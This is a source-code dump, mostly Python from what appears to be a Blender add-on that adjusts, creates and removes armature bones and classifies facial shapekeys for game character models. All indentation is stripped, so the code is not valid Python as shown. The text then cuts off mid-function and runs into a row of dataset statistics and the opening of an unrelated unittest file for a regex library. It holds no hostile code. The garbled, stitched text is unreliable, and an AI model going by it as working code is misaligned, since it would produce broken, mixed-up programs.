armature.data.edit_bones[prefix + bone].tail.xyz = ptoe.head.x*1.1, -2*unit, ptoe.head.z
else:
armature.data.edit_bones[prefix + bone].tail.xyz = ptoe.head.x*1.1, -7*unit, ptoe.head.z
#Extends hand bone
for index, bone in enumerate(arm.symmetrical_bones['arms']['hand']):
if bone:
prefix, bone = bone_convert(bone)
ehand = armature.data.edit_bones[prefix + bone]
if arm.symmetrical_bones['arms']['forearm'] and arm.symmetrical_bones['arms']['forearm'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['forearm'][index])
eforearm = armature.data.edit_bones[prefix + bone]
length = eforearm.length
if vatinfo.sbox:
eforearm.length = eforearm.length*1.5
elif arm.symmetrical_bones['legs'].get('thighlow'):
eforearm.length = eforearm.length*1.75
else:
eforearm.length = eforearm.length*1.25
ehand.tail = eforearm.tail
eforearm.length = length
#Extends feet bone if no toe bone is present
for index, bone in enumerate(arm.symmetrical_bones['legs']['foot']):
if bone:
prefix, bone = bone_convert(bone)
efoot = armature.data.edit_bones[prefix + bone]
if not arm.symmetrical_bones['legs']['toe0'] or not arm.symmetrical_bones['legs']['toe0'][index]:
if efoot.tail.y < 0:
efoot.tail.y = efoot.tail.y*5
elif efoot.tail.y > 0:
efoot.tail.y = efoot.tail.y*-5
efoot.tail.z = efoot.tail.z*0.4
#Extends forearm bone if no hand bone is present
for index, bone in enumerate(arm.symmetrical_bones['arms']['upperarm']):
if bone:
prefix, bone = bone_convert(bone)
eupperarm = armature.data.edit_bones[prefix + bone]
if not arm.symmetrical_bones['arms']['hand'] or not arm.symmetrical_bones['arms']['hand'][index]:
if arm.symmetrical_bones['arms']['forearm'] and arm.symmetrical_bones['arms']['forearm'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['forearm'][index])
eforearm = armature.data.edit_bones[prefix + bone]
length = eupperarm.length
eupperarm.length = eupperarm.length*2.5
eforearm.tail = eupperarm.tail
eupperarm.length = length
#Extends calf bone if no feet bone is present
for index, bone in enumerate(arm.symmetrical_bones['legs']['thigh']):
if bone:
prefix, bone = bone_convert(bone)
ethigh = armature.data.edit_bones[prefix + bone]
if not arm.symmetrical_bones['legs']['foot'] or not arm.symmetrical_bones['legs']['foot'][index]:
if arm.symmetrical_bones['legs']['calf'] and arm.symmetrical_bones['legs']['calf'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['legs']['calf'][index])
ecalf = armature.data.edit_bones[prefix + bone]
length = ethigh.length
ethigh.length = ethigh.length*2
ecalf.tail = ethigh.tail
ethigh.length = length
if type == 'anim':
#Fix for legs/arms rotating the wrong way in most characters with the animation armature
for index, bone in enumerate(arm.symmetrical_bones['arms']['forearm']):
if bone:
prefix, bone = bone_convert(bone)
eforearm = armature.data.edit_bones[prefix + bone]
if arm.symmetrical_bones['arms']['upperarm'] and arm.symmetrical_bones['arms']['upperarm'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['forearm'][index])
eupperarm = armature.data.edit_bones[prefix + bone]
if eforearm.head.y <= eupperarm.head.y:
eforearm.head.y = eupperarm.head.y + 0.25*unit
for index, bone in enumerate(arm.symmetrical_bones['legs']['calf']):
if bone:
prefix, bone = bone_convert(bone)
ecalf = armature.data.edit_bones[prefix + bone]
if arm.symmetrical_bones['legs']['thigh'] and arm.symmetrical_bones['legs']['thigh'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['legs']['thigh'][index])
ethigh = armature.data.edit_bones[prefix + bone]
if ecalf.head.y > ethigh.head.y:
ecalf.head.y = ethigh.head.y - 0.25*unit
##Weight armature bone tweaks##
elif type == 'weight':
##Knee/Elbow##
for index, bone in enumerate(arm.helper_bones['arms']['elbow']):
if bone:
prefix, bone = bone_convert(bone)
pelbow = armature.pose.bones[prefix + bone]
eelbow = armature.data.edit_bones[prefix + bone]
eelbow.tail.xyz = pelbow.head.x, pelbow.head.y + 5*unit, pelbow.head.z
for index, bone in enumerate(arm.helper_bones['legs']['knee']):
if bone:
prefix, bone = bone_convert(bone)
pknee = armature.pose.bones[prefix + bone]
eknee = armature.data.edit_bones[prefix + bone]
eknee.tail.xyz = pknee.head.x, pknee.head.y - 5*unit, pknee.head.z
##Trapezius##
for index, bone in enumerate(arm.symmetrical_bones['arms']['clavicle']):
if bone:
if arm.helper_bones['arms']['trapezius'] and arm.helper_bones['arms']['trapezius'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['trapezius'][index])
etrapezius = armature.data.edit_bones[prefix + bone]
if arm.symmetrical_bones['arms']['upperarm'] and arm.symmetrical_bones['arms']['upperarm'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['upperarm'][index])
pupperarm = armature.pose.bones[prefix + bone]
etrapezius.tail = pupperarm.head
##Shoulder/Bicep##
for index, bone in enumerate(arm.symmetrical_bones['arms']['upperarm']):
if bone:
prefix, bone = bone_convert(bone)
eupperarm = armature.data.edit_bones[prefix + bone]
#Forces upperarm to use shoulder's position if it exists
if arm.helper_bones['arms']['shoulder'] and arm.helper_bones['arms']['shoulder'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['shoulder'][index])
pshoulder = armature.pose.bones[prefix + bone]
eupperarm.tail = pshoulder.head
#Forces upperarm to use bicep's position if they exist
elif arm.helper_bones['arms']['bicep'] and arm.helper_bones['arms']['bicep'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['bicep'][index])
pbicep = armature.pose.bones[prefix + bone]
eupperarm.tail = pbicep.head
#If shoulder and bicep are present
if arm.helper_bones['arms']['shoulder'] and arm.helper_bones['arms']['bicep'] and arm.helper_bones['arms']['shoulder'][index] and arm.helper_bones['arms']['bicep'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['shoulder'][index])
eshoulder = armature.data.edit_bones[prefix + bone]
prefix, bone = bone_convert(arm.helper_bones['arms']['bicep'][index])
pbicep = armature.pose.bones[prefix + bone]
ebicep = armature.data.edit_bones[prefix + bone]
eshoulder.head = eupperarm.head
eupperarm.head = eshoulder.tail
eupperarm.tail = pbicep.head
if arm.symmetrical_bones['arms']['forearm'] and arm.symmetrical_bones['arms']['forearm'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['forearm'][index])
pforearm = armature.pose.bones[prefix + bone]
ebicep.tail = pforearm.head
#Else if only shoulder is present
elif arm.helper_bones['arms']['shoulder'] and arm.helper_bones['arms']['shoulder'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['shoulder'][index])
eshoulder = armature.data.edit_bones[prefix + bone]
eshoulder.head = eupperarm.head
eupperarm.head = eshoulder.tail
if arm.symmetrical_bones['arms']['forearm'] and arm.symmetrical_bones['arms']['forearm'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['forearm'][index])
pforearm = armature.pose.bones[prefix + bone]
eupperarm.tail = pforearm.head
#Else if only bicep is present
elif arm.helper_bones['arms']['bicep'] and arm.helper_bones['arms']['bicep'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['bicep'][index])
pbicep = armature.pose.bones[prefix + bone]
ebicep = armature.data.edit_bones[prefix + bone]
eupperarm.tail = pbicep.head
if arm.symmetrical_bones['arms']['forearm'] and arm.symmetrical_bones['arms']['forearm'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['forearm'][index])
pforearm = armature.pose.bones[prefix + bone]
ebicep.tail = pforearm.head
##Ulna/Wrist##
for index, bone in enumerate(arm.symmetrical_bones['arms']['forearm']):
if bone:
prefix, bone = bone_convert(bone)
eforearm = armature.data.edit_bones[prefix + bone]
#Force forearm to use forearm_driven's position if available
if arm.helper_bones['viewmodel']['forearm_driven'] and arm.helper_bones['viewmodel']['forearm_driven'][index]:
prefix, bone = bone_convert(arm.helper_bones['viewmodel']['forearm_driven'][index])
pforearm_driven = armature.pose.bones[prefix + bone]
eforearm.tail = pforearm_driven.head
else:
if arm.helper_bones['arms']['ulna'] and arm.helper_bones['arms']['ulna'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['ulna'][index])
pulna = armature.pose.bones[prefix + bone]
eforearm.tail = pulna.head
if arm.symmetrical_bones['arms']['hand'] and arm.symmetrical_bones['arms']['hand'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['hand'][index])
phand = armature.pose.bones[prefix + bone]
ehand = armature.data.edit_bones[prefix + bone]
if arm.helper_bones['arms']['ulna'] and arm.helper_bones['viewmodel']['forearm_driven'] and arm.helper_bones['arms']['ulna'][index] and arm.helper_bones['viewmodel']['forearm_driven'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['ulna'][index])
eulna = armature.data.edit_bones[prefix + bone]
eulna.tail = phand.head
prefix, bone = bone_convert(arm.helper_bones['viewmodel']['forearm_driven'][index])
eforearm_driven = armature.data.edit_bones[prefix + bone]
eforearm_driven.tail = eulna.head
#If both ulna and wrist are present
elif arm.helper_bones['arms']['ulna'] and arm.helper_bones['arms']['wrist'] and arm.helper_bones['arms']['ulna'][index] and arm.helper_bones['arms']['wrist'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['ulna'][index])
eulna = armature.data.edit_bones[prefix + bone]
eulna.tail = phand.head
eulna.length = eulna.length/1.6
prefix, bone = bone_convert(arm.helper_bones['arms']['wrist'][index])
ewrist = armature.data.edit_bones[prefix + bone]
ewrist.head = eulna.tail
ewrist.tail = phand.head
#Else if only ulna is present
elif arm.helper_bones['arms']['ulna'] and arm.helper_bones['arms']['ulna'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['ulna'][index])
eulna = armature.data.edit_bones[prefix + bone]
eulna.tail = phand.head
#Else if only wrist is present
elif arm.helper_bones['arms']['wrist'] and arm.helper_bones['arms']['wrist'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['wrist'][index])
ewrist = armature.data.edit_bones[prefix + bone]
eforearm.length = eforearm.length/1.3
ewrist.head = eforearm.tail
ewrist.tail = phand.head
eforearm.tail = ewrist.head
ewrist.use_connect = True
else: #If neither are present
eforearm.tail = phand.head
ehand.use_connect = True
##Quadricep##
for index, bone in enumerate(arm.symmetrical_bones['legs']['thigh']):
if bone:
prefix, bone = bone_convert(bone)
ethigh = armature.data.edit_bones[prefix + bone]
#bone2 present to avoid problems with the last condition
#Force thigh to use quad's position if available
if arm.helper_bones['legs']['quadricep'] and arm.helper_bones['legs']['quadricep'][index]:
prefix2, bone2 = bone_convert(arm.helper_bones['legs']['quadricep'][index])
pquadricep = armature.pose.bones[prefix2 + bone2]
equadricep = armature.data.edit_bones[prefix2 + bone2]
ethigh.tail = pquadricep.head
if arm.symmetrical_bones['legs']['calf'] and arm.symmetrical_bones['legs']['calf'][index]:
prefix2, bone2 = bone_convert(arm.symmetrical_bones['legs']['calf'][index])
pcalf = armature.pose.bones[prefix2 + bone2]
equadricep.tail = pcalf.head
#Gluteus (Only for Zoey)
if arm.helper_bones['others'].get('gluteus'):
if arm.helper_bones['others']['gluteus'] and arm.helper_bones['others']['gluteus'][index]:
prefix2, bone2 = bone_convert(arm.helper_bones['others']['gluteus'][index])
pgluteus = armature.pose.bones[prefix2 + bone2]
pgluteus.rotation_quaternion[3] = -1
pgluteus.scale.xyz = 25,25,25
bpy.ops.object.mode_set(mode='POSE')
armature.data.bones[prefix2 + bone2].select = True
bpy.ops.pose.armature_apply(selected=True)
bpy.ops.pose.select_all(action='DESELECT')
bpy.ops.object.mode_set(mode='EDIT')
ethigh = armature.data.edit_bones[prefix + bone]
egluteus = armature.data.edit_bones[prefix2 + bone2]
ethigh.head = egluteus.tail
#Shoulder1 (Only for Louis)
if arm.helper_bones['arms'].get('shoulder1'):
if arm.symmetrical_bones['arms']['clavicle']:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['clavicle'][0])
eclavicle = armature.data.edit_bones[prefix + bone]
if arm.helper_bones['arms']['shoulder']:
prefix, bone = bone_convert(arm.helper_bones['arms']['shoulder'][0])
eshoulder = armature.data.edit_bones[prefix + bone]
eclavicle.tail = eshoulder.head
elif arm.symmetrical_bones['arms']['upperarm']:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['upperarm'][0])
eupperarm = armature.data.edit_bones[prefix + bone]
eclavicle.tail = eupperarm.head
##Thumbroot## (Only for viewmodels)
for index, bone in enumerate(arm.symmetrical_bones['arms']['hand']):
if bone:
prefix, bone = bone_convert(bone)
phand = armature.pose.bones[prefix + bone]
ehand = armature.data.edit_bones[prefix + bone]
if arm.helper_bones['viewmodel']['thumbroot'] and arm.helper_bones['viewmodel']['thumbroot'][index]:
prefix, bone = bone_convert(arm.helper_bones['viewmodel']['thumbroot'][index])
ethumbroot = armature.data.edit_bones[prefix + bone]
ethumbroot.head = phand.head
if arm.symmetrical_bones['fingers']['finger0'] and arm.symmetrical_bones['fingers']['finger0'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['fingers']['finger0'][index])
pfinger0 = armature.pose.bones[prefix + bone]
ethumbroot.tail = pfinger0.head
if vatinfo.sbox:
for index, bone in enumerate(arm.symmetrical_bones['legs']['thigh']):
if bone:
prefix, bone = bone_convert(bone)
ethigh = armature.data.edit_bones[prefix + bone]
if arm.helper_bones['legs']['quadricep'] and arm.helper_bones['legs']['quadricep'][index]:
prefix, bone = bone_convert(arm.helper_bones['legs']['quadricep'][index])
equadricep = armature.data.edit_bones[prefix + bone]
equadricep.head = ethigh.head
equadricep.length = equadricep.length / 3
ethigh.head = equadricep.tail
if arm.symmetrical_bones['legs']['calf'] and arm.symmetrical_bones['legs']['calf'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['legs']['calf'][index])
ecalf = armature.data.edit_bones[prefix + bone]
ethigh.tail = ecalf.head
for index, bone in enumerate(arm.symmetrical_bones['legs']['foot']):
if bone:
prefix, bone = bone_convert(bone)
efoot = armature.data.edit_bones[prefix + bone]
if arm.helper_bones['legs'].get('lowerleg') and arm.helper_bones['legs']['lowerleg'][index]:
prefix, bone = bone_convert(arm.helper_bones['legs']['lowerleg'][index])
elowerleg = armature.data.edit_bones[prefix + bone]
elowerleg.tail = efoot.head
for index, bone in enumerate(arm.symmetrical_bones['arms']['hand']):
if bone:
prefix, bone = bone_convert(bone)
ehand = armature.data.edit_bones[prefix + bone]
if arm.helper_bones['arms']['wrist'] and arm.helper_bones['arms']['wrist'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['wrist'][index])
ewrist = armature.data.edit_bones[prefix + bone]
ewrist.length = ewrist.length*1.35
ehand.tail = ewrist.tail
ewrist.length = ewrist.length/1.5
ehand.head = ewrist.tail
if vatinfo.titanfall:
#Changes pelvis position to avoid deletion
if arm.central_bones['pelvis'] and arm.central_bones['spine1']:
prefix, bone = bone_convert(arm.central_bones['pelvis'][0])
epelvis = armature.data.edit_bones[prefix + bone]
prefix, bone = bone_convert(arm.central_bones['spine1'][0])
espine1 = armature.data.edit_bones[prefix + bone]
epelvis.tail = espine1.head
epelvis.length = epelvis.length/3
#Aligns calf to the thigh
for index, bone in enumerate(arm.symmetrical_bones['legs']['calf']):
if bone:
prefix, bone = bone_convert(bone)
ecalf = armature.data.edit_bones[prefix + bone]
if arm.symmetrical_bones['legs'].get('thighlow') and arm.symmetrical_bones['legs']['thighlow'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['legs']['thighlow'][index])
ethighlow = armature.data.edit_bones[prefix + bone]
ecalf.head = ethighlow.tail
ecalf.use_connect = True
elif arm.symmetrical_bones['legs']['thigh'] and arm.symmetrical_bones['legs']['thigh'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['legs']['thigh'][index])
ethigh = armature.data.edit_bones[prefix + bone]
ecalf.head = ethigh.tail
#Removes head bone since it serves no purpose and neck2 serves its purpose anyways, and repositions both neck bones to be more accurate to where they would really be
if arm.central_bones['head'] and arm.central_bones['neck'] and arm.central_bones.get('neck2'):
prefix, bone = bone_convert(arm.central_bones['head'][0])
ehead = armature.data.edit_bones[prefix + bone]
prefix, bone = bone_convert(arm.central_bones['neck'][0])
eneck = armature.data.edit_bones[prefix + bone]
prefix, bone = bone_convert(arm.central_bones['neck2'][0])
eneck2 = armature.data.edit_bones[prefix + bone]
eneck.tail = eneck2.head
eneck2.tail = ehead.tail
eneck2.parent = eneck
eneck2.use_connect = True
armature.data.edit_bones.remove(ehead)
#Corrects central bones roll values to 0
if type == 'anim':
for container, bone in arm.central_bones.items():
for bone in bone:
if bone:
if vatinfo.titanfall and bone.title().count('Head'):
continue
prefix, bone = bone_convert(bone)
ebone = armature.data.edit_bones[prefix + bone]
ebone.roll = 0
#Finger tips tweak
for container, bone in arm.symmetrical_bones['fingers'].items():
if container == 'finger0' or container == 'finger1' or container == 'finger2' or container == 'finger3' or container == 'finger4':
for index, bone in enumerate(bone):
if bone:
prefix, bone = bone_convert(bone)
tip = container[0:7] + '2'
middle = container[0:7] + '1'
if arm.symmetrical_bones['fingers'][tip] and arm.symmetrical_bones['fingers'][tip][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['fingers'][middle][index])
ebone = armature.data.edit_bones[prefix + bone]
length = ebone.length
ebone.length = length*2
prefix, bone = bone_convert(arm.symmetrical_bones['fingers'][tip][index])
armature.data.edit_bones[prefix + bone].tail.xyz = ebone.tail.x, ebone.tail.y, ebone.tail.z
ebone.length = length
elif arm.symmetrical_bones['fingers'][middle] and arm.symmetrical_bones['fingers'][middle][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['fingers'][container][index])
ebone = armature.data.edit_bones[prefix + bone]
length = ebone.length
ebone.length = length*2
prefix, bone = bone_convert(arm.symmetrical_bones['fingers'][middle][index])
armature.data.edit_bones[prefix + bone].tail = ebone.tail
ebone.length = length
#If no head
if not arm.central_bones['head']:
ebone = None
ebone2 = None
if arm.central_bones['spine4'] and arm.central_bones['spine2']:
prefix, bone = bone_convert(arm.central_bones['spine2'][0])
ebone = armature.data.edit_bones[prefix + bone]
prefix, bone = bone_convert(arm.central_bones['spine4'][0])
ebone2 = armature.data.edit_bones[prefix + bone]
elif arm.central_bones['spine3'] and arm.central_bones['neck']:
prefix, bone = bone_convert(arm.central_bones['spine3'][0])
ebone = armature.data.edit_bones[prefix + bone]
prefix, bone = bone_convert(arm.central_bones['neck'][0])
ebone2 = armature.data.edit_bones[prefix + bone]
elif arm.central_bones['spine3'] and arm.central_bones['spine2']:
prefix, bone = bone_convert(arm.central_bones['spine2'][0])
ebone = armature.data.edit_bones[prefix + bone]
prefix, bone = bone_convert(arm.central_bones['spine3'][0])
ebone2 = armature.data.edit_bones[prefix + bone]
if ebone and ebone2:
length = ebone.length
ebone.length = ebone.length*1.75
ebone2.tail = ebone.tail
ebone.length = length
ebone2.tail.y = ebone2.head.y
else:
#Gmod default viewmodels only have spine4, this aligns it
if arm.central_bones['spine4']:
prefix, bone = bone_convert(arm.central_bones['spine4'][0])
ebone = armature.data.edit_bones[prefix + bone]
ebone.tail.x = ebone.head.x
#Rotates bones with no children to be more readable while keeping their isolated form intact
if arm.chainless_bones:
for bone in arm.chainless_bones:
prefix, bone = bone_convert(bone)
ebone = armature.data.edit_bones[prefix + bone]
if type == 'anim':
if ebone.children[0].name.endswith('.isolated'):
ebone2 = armature.data.edit_bones[ebone.children[0].name]
ebone2.parent = None
bpy.ops.object.mode_set(mode='POSE')
bpy.ops.pose.armature_apply()
bpy.ops.pose.select_all(action='DESELECT')
bpy.ops.object.mode_set(mode='EDIT')
if type == 'anim':
for bone in arm.chainless_bones:
prefix, bone = bone_convert(bone)
ebone = armature.data.edit_bones[prefix + bone]
ebone2 = armature.data.edit_bones[prefix + bone + '.isolated']
ebone2.parent = ebone
armature.location = arm.armature.location
armature.rotation_euler = arm.armature.rotation_euler
armature.scale = arm.armature.scale
#Final touches to the armature
armature.data.display_type = 'OCTAHEDRAL'
armature.show_in_front = True
if type == 'weight':
armature.data.show_bone_custom_shapes = False
elif type == 'anim':
armature.data.rigify_advanced_generation = True
armature.data.rigify_generate_mode = 'new'
armature.data.rigify_rig_basename = arm.armature.name + '.anim'
bpy.ops.object.mode_set(mode='OBJECT')
#Deletion
elif action == 1 or action == 2:
#Checks if they weren't deleted already
if type == 'weight':
try:
bpy.data.objects.remove(arm.weight_armature)
except:
print("Weight armature already deleted, cleaning rest")
try:
bpy.data.armatures.remove(arm.weight_armature_real)
except:
pass
vatinfo.weight_armature = False
arm.weight_armature = None
arm.weight_armature_real = None
elif type == 'anim':
if not vatinfo.animation_armature_setup:
try:
animation_data = bpy.data.objects[arm.animation_armature_real['target_object']].data
bpy.data.objects[arm.animation_armature_real['target_object']].data = bpy.data.meshes[arm.animation_armature_real['target_object_data']]
bpy.data.meshes.remove(animation_data)
except:
pass
try:
bpy.data.objects.remove(arm.animation_armature)
except:
print("Animation armature already deleted, cleaning rest")
bpy.data.armatures.remove(arm.animation_armature_real)
if action == 1 and vatinfo.animation_armature_setup:
try:
object = bpy.data.objects[arm.armature.name + '.anim']
bpy.data.objects.remove(object)
except:
pass
try:
armature = bpy.data.armatures[arm.armature_real.name + '.anim']
bpy.data.armatures.remove(armature)
except:
pass
elif action == 2:
arm.animation_armature = bpy.data.objects[arm.armature.name + '.anim']
arm.animation_armature_real = bpy.data.armatures[arm.armature_real.name + '.anim']
#Checks if retarget empties are present, if so, remove them
if action == 1:
armature = arm.armature
#Removes viewmodel camera if present
try:
camera = bpy.data.objects['viewmodel_camera']
camera_data = bpy.data.cameras['viewmodel_camera']
bpy.data.objects.remove(camera)
bpy.data.cameras.remove(camera_data)
except:
pass
#Removes original armature constraints
for cat in arm.symmetrical_bones.keys():
for bone in arm.symmetrical_bones[cat].values():
for bone in bone:
if bone:
prefix, bone = bone_convert(bone)
try:
constraint = armature.pose.bones[prefix + bone].constraints["Retarget Location"]
armature.pose.bones[prefix + bone].constraints.remove(constraint)
except:
pass
try:
constraint = armature.pose.bones[prefix + bone].constraints["Retarget Rotation"]
armature.pose.bones[prefix + bone].constraints.remove(constraint)
except:
pass
for container, bone in arm.central_bones.items():
for bone in bone:
if bone:
try:
constraint = armature.pose.bones[prefix + bone].constraints["Retarget Location"]
armature.pose.bones[prefix + bone].constraints.remove(constraint)
except:
pass
try:
constraint = armature.pose.bones[prefix + bone].constraints["Retarget Rotation"]
armature.pose.bones[prefix + bone].constraints.remove(constraint)
except:
pass
for cat in arm.helper_bones.keys():
for container, bone in arm.helper_bones[cat].items():
if container == 'elbow' or container == 'knee':
for bone in bone:
if bone:
prefix2, bone2 = bone_convert(bone)
try:
constraint = armature.pose.bones[prefix2 + bone2].constraints["Retarget Location"]
armature.pose.bones[prefix2 + bone2].constraints.remove(constraint)
except:
pass
try:
constraint = armature.pose.bones[prefix2 + bone2].constraints["Retarget Rotation"]
armature.pose.bones[prefix2 + bone2].constraints.remove(constraint)
except:
pass
for container, bone in arm.other_bones.items():
if container == 'weapon' or container == 'viewmodel':
for bone in bone:
if bone:
prefix, bone = bone_convert(bone)
try:
constraint = armature.pose.bones[prefix + bone].constraints["Retarget Location"]
armature.pose.bones[prefix + bone].constraints.remove(constraint)
except:
pass
try:
constraint = armature.pose.bones[prefix + bone].constraints["Retarget Rotation"]
armature.pose.bones[prefix + bone].constraints.remove(constraint)
except:
pass
for container, bone in arm.custom_bones.items():
for bone in bone:
if bone:
try:
constraint = armature.pose.bones[bone].constraints["Retarget Location"]
armature.pose.bones[bone].constraints.remove(constraint)
except:
pass
try:
constraint = armature.pose.bones[bone].constraints["Retarget Rotation"]
armature.pose.bones[bone].constraints.remove(constraint)
except:
pass
try:
collection = bpy.data.collections["Retarget Empties ({})".format(arm.armature.name)[0:60]]
if collection.objects.values():
for object in collection.objects.values():
data = object.data
bpy.data.objects.remove(object)
bpy.data.collections.remove(collection)
except:
pass
arm.animation_armature = None
arm.animation_armature_real = None
vatinfo.animation_armature = False
#Reselects original armature for the sake of convenience
armature = arm.armature
if type == 'anim':
if armature.hide_get() == True:
armature.hide_set(False)
if armature.visible_get():
armature.select_set(True)
bpy.context.view_layer.objects.active = armature
#Thanku Orin for the enhanced code snippet
def bone_convert(bone):
vatinfo = bpy.context.scene.vatinfo
prefix = ''
# 'h' = Helper
# 'a' = Attachments
# 'p' = Standard
bone = bone.split('.')
if len(bone) > 1:
if bone[0] == 'h1':
prefix = Prefixes.helper
elif bone[0] == 'h2':
prefix = Prefixes.helper2
elif bone[0] == 'a1':
prefix = Prefixes.attachment
elif bone[0] == 'a2':
prefix = Prefixes.attachment2
elif bone[0] == 'p1':
prefix = vatinfo.prefix
elif bone[0] == 'p2':
prefix = Prefixes.other
bone = bone[1]
else:
bone = bone[0]
return prefix, bone
def generate_shapekey_dict(dictionary, raw_list):
for shapekey in raw_list:
#Basis
if shapekey.casefold().count('basis') or shapekey.casefold().count('base'):
dictionary['basis']['basis'] = shapekey
#Eyebrows
if shapekey.upper().count('AU1AU2L') or shapekey.upper().count('AU1AU2R'):
dictionary['eyebrows']['AU1AU2'] = shapekey
elif shapekey.upper().count('AU1AU4L') or shapekey.upper().count('AU1AU4R'):
dictionary['eyebrows']['AU1AU4'] = shapekey
elif shapekey.upper().count('AU2AU4L') or shapekey.upper().count('AU2AU4R'):
dictionary['eyebrows']['AU2AU4'] = shapekey
elif shapekey.upper().count('AU1L') or shapekey.upper().count('AU1R'):
dictionary['eyebrows']['AU1'] = shapekey
elif shapekey.upper().count('AU2L') or shapekey.upper().count('AU2R'):
dictionary['eyebrows']['AU2'] = shapekey
elif shapekey.upper().count('AU4L') or shapekey.upper().count('AU4R'):
dictionary['eyebrows']['AU4'] = shapekey
#Eyes
elif shapekey.lower().count('f01') or shapekey.lower().count('frame1'):
dictionary['eyes']['f01'] = shapekey
elif shapekey.lower().count('f02') or shapekey.lower().count('frame2'):
dictionary['eyes']['f02'] = shapekey
elif shapekey.lower().count('f03') or shapekey.lower().count('frame3'):
dictionary['eyes']['f03'] = shapekey
elif shapekey.lower().count('f04'):
dictionary['eyes']['f04'] = shapekey
elif shapekey.upper().count('AU42'):
dictionary['eyes']['AU42'] = shapekey
#Cheek
elif shapekey.upper().count('AU6ZL') or shapekey.upper().count('AU6ZR'):
dictionary['cheek']['AU6Z'] = shapekey
elif shapekey.upper().count('AU13L') or shapekey.upper().count('AU13R'):
dictionary['cheek']['AU13'] = shapekey
#Nose
elif shapekey.upper().count('AU9L') or shapekey.upper().count('AU9R'):
dictionary['nose']['AU9'] = shapekey
elif shapekey.upper().count('AU38'):
dictionary['nose']['AU38'] = shapekey
#Mouth
elif shapekey.upper().count('AU12L') or shapekey.upper().count('AU12R'):
dictionary['mouth']['AU12'] = shapekey
elif shapekey.upper().count('AU15L') or shapekey.upper().count('AU15R'):
dictionary['mouth']['AU15'] = shapekey
elif shapekey.upper().count('AU10L') or shapekey.upper().count('AU10R'):
dictionary['mouth']['AU10'] = shapekey
elif shapekey.upper().count('AU17DL') or shapekey.upper().count('AU17DR'):
dictionary['mouth']['AU17D'] = shapekey
elif shapekey.upper().count('AU16L') or shapekey.upper().count('AU16R'):
dictionary['mouth']['AU16'] = shapekey
elif shapekey.upper().count('AU32'):
dictionary['mouth']['AU32'] = shapekey
elif shapekey.upper().count('AU24'):
dictionary['mouth']['AU24'] = shapekey
elif shapekey.upper().count('AU18ZL') or shapekey.upper().count('AU18ZR'):
dictionary['mouth']['AU18Z'] = shapekey
elif shapekey.upper().count('AU22ZL') or shapekey.upper().count('AU22ZR'):
dictionary['mouth']['AU22Z'] = shapekey
elif shapekey.upper().count('AD96L'):
dictionary['mouth']['AD96L'] = shapekey
elif shapekey.upper().count('AD96R'):
dictionary['mouth']['AD96R'] = shapekey
#Chin
elif shapekey.upper().count('AU31'):
dictionary['chin']['AU31'] = shapekey
elif shapekey.upper().count('AU26L') or shapekey.upper().count('AU26R'):
dictionary['chin']['AU26'] = shapekey
elif shapekey.upper().count('AU27L') or shapekey.upper().count('AU27R'):
dictionary['chin']['AU27'] = shapekey
elif shapekey.upper().count('AU27ZL') or shapekey.upper().count('AU27ZR'):
dictionary['chin']['AU27Z'] = shapekey
elif shapekey.upper().count('AD30L'):
dictionary['chin']['AD30L'] = shapekey
elif shapekey.upper().count('AD30R'):
dictionary['chin']['AD30R'] = shapekey
elif shapekey.upper().count('AU17L') or shapekey.upper().count('AU17R'):
dictionary['chin']['AU17'] = shapekey
return dictionary
def update_armature(self, context):
armature(1) | 53.180081 | 413 | 0.469749 | 11,754 | 130,823 | 5.112472 | 0.063893 | 0.045098 | 0.03894 | 0.036694 | 0.681222 | 0.576433 | 0.48454 | 0.437978 | 0.400053 | 0.365556 | 0 | 0.015287 | 0.424467 | 130,823 | 2,460 | 414 | 53.180081 | 0.782822 | 0.047629 | 0 | 0.457864 | 0 | 0 | 0.072784 | 0.000692 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009125 | false | 0.009125 | 0.002684 | 0 | 0.01664 | 0.005904 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e9585d7f1ca9ea63085498a5a7d9a868dd8c84d | 9,550 | py | Python | test/test_rex.py | dotwork/rex | 89c67feacbd4d7c07f68214cc9e02988ad05e2e2 | [
"MIT"
] | null | null | null | test/test_rex.py | dotwork/rex | 89c67feacbd4d7c07f68214cc9e02988ad05e2e2 | [
"MIT"
] | null | null | null | test/test_rex.py | dotwork/rex | 89c67feacbd4d7c07f68214cc9e02988ad05e2e2 | [
"MIT"
] | null | null | null | import os
import re
import unittest
from models import Rex
base_dir = os.path.dirname(__file__)
data_dir = os.path.join(base_dir, "data")
########################################################################################################################
class RexAssertions(unittest.TestCase):
